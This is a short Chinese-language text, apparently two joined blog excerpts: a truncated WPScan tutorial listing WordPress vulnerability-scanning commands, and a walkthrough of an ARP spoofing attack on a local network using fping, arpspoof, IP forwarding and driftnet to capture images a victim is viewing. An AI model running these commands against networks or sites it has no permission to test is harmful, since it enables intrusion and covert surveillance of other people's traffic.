简介 WPscan是一个扫描Wordpress漏洞的工具,一般在Kali/Parrot/Cyborg等常见渗透测试Linux系统中自带,这里学习一下常见的命令 常见命令 使用之前,先到官方Github下载data.zip放到软件根目录/usr/share/wpscan/下 并解压 wpscan –update //更新漏洞库 wpscan --url http:/testurl/ //扫描一些基本信息 wpscan --url http://testurl/ -e //全面检测 wpscan --url http:…
使用步骤 1、先扫一下内网内的IP fping -asg 192.168.237.0/24 这是扫到的结果,可以看见网关IP和虚拟机的IP 2、进行攻击 执行命令 arpspoof -i eth0 -t 对方内网IP 网关 可以看到被攻击的主机已经完蛋了 3、其他玩法 echo "1" > /proc/sys/net/ipv4/ip_forward //将值改为1 sudo driftnet –i eth0 获取到了对方浏览的图片,还行
